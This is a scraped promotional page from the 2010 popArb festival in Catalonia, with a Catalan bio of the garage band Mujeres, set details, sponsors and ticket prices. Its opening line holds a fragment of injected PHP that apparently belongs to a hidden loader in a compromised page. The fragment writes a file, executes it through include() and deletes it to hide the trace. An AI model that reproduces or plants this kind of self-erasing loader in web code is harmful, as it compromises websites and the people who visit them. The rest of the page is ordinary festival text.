");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> popArb 2010 : cartell : Mujeres

popArb - Festival de Música Independent feta a Catalunya. Arbucies, Girona

Mujeres

dissabte 26 de juny. 2010
Envelat Estrella Damm (Can Cassó) 01:40

Mujeres són quatre individus de Barcelona que, reunits sota l'estela universitària, van decidir crear un grup de garatge suós i ketamínic. Si bé és cert que grups com Black Lips són una clara influència, aquests no són res més que la punta de l'iceberg d'una escena americana extremadament prolífica que els encanta: Jay Reatard, Jacuzzi Boys, Dead Ghosts i molts altres.

Practiquen una sort de garatge amb un gran talent per trobar la mescla perfecta entre les harmonies vocals, el riff més brut i el ritme martellejant. D'aquí en resulten cançons festives, fresques i ballables que atrapen al moment, tal com sabien fer The Sonics, The Velvet Underground, The Modern Lovers, The 13th Floor Elevators o Los Saicos.

Tots quatre han tocat amb diferents bandes anteriorment que viatgen del hardcore al rockabilly o, fins i tot, el folk.
En menys d'un any i amb una sola maqueta sota el braç, Mujeres han tocat a les principals sales de Barcelona (Razzmatazz, Apolo, Sidecar, etc) i Madrid, han telonejat The Stranglers i actuat a festivals com el Primavera Sound, DiBa i Europavox (FR) -en el que van ser escollits com a representació estatal-.

Recentment, han quedat entre els 10 finalistes del prestigiós concurs internacional Diesel U Music i han col·laborat en nombrosos esdeveniments i projectes de marques com Vice, Ray Ban, Jägermeister, entre d'altres.

Ara, amb el seu aclamat àlbum de debut Mujeres (Sones 2009), gravat als estudis Ultramarinos Costa Brava, sota la supervisió de Santi Garcia, la gira de Mujeres s'extén per sales i festivals de tot l'estat i l'estranger.

Organitzen: Ajuntament d'Arbcies, Cultura Dispersa

Collaboren: Departament de Cultura i Mitjans de Comunicaci de la Generalitat de Catalunya, Diputaci de Girona, AiE

Mitjans Oficials: TV3, iCat fm

Recomanat per: Scanner fm, Enderrock, Nativa, Butxaca, TresC

Col·laboradors: Demasié, FETE, cupatges,Vialis-Aro, Guerrilla Sound

 

estrella damm

Estrella Damm patrocina el popArb 2010

Venda a ServiCaixa

atrapalo

Abonaments i entrades de dia a Servicaixa.com.

Divendres: 30€
Dissabte: 35€
Abonament: 45€

Consulteu Servicaixa.com per conèixer preu de gestió i descomptes aplicables.

popArb 2010 © | culturaDispersa SL | Avís LegalSobre el popArb
RSS | youtube/popArb2009 || myspace/poparb